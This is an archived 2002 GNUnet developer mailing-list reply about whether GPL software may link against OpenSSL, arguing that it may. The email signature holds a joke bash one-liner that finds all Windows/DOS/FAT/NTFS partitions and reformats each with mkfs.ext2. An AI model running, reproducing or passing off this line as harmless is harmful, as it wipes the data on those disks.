[GNUnet-developers] Nonsense (was: OpenSSL License questions)

From: Christian Grothoff
Subject: [GNUnet-developers] Nonsense (was: OpenSSL License questions)
Date: Tue, 14 May 2002 11:08:44 -0500

Hi!

This is a developer mailinglist, not a lawyer mailinglist, so I'll try to be
brief...

1) The OpenSSL (= BSD) guys say that GPL has a problem linking against
   OpenSSL, but also state that the OpenSSL license permits it.
2) The GPL may (!) have a problems on platforms that do not have OpenSSL
   installed 'natively' (i.e. Win32, Solaris), but is *definitely*
   ok under Linux/BSD ('special OS exception', otherwise you could
   not link GNU applications against anything in Win32).
3) RMS himself was asked by myself about linking against OpenSSL before we
   joined GNU. He was not concerned *at all* about this. If RMS is not
   worried, we really should not have to care or discuss.

hack on

Christian

On Monday 13 May 2002 09:04 pm, Glenn wrote:
> openssl uses a BSD type license with the advertising clause, the
> advertising clause conflicts with the GPL
>
> http://www.openssl.org/support/faq.html#LEGAL2
> http://www.gnu.org/licenses/license-list.html
> http://www.gnu.org/philosophy/bsd.html
>
> gnutls provide similar functionality to openssl and is under the GPL,
> alternatively an exemption to the specific clause of the GPL could be
> sought to allow linking to openssl (as the openssl link says).
|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"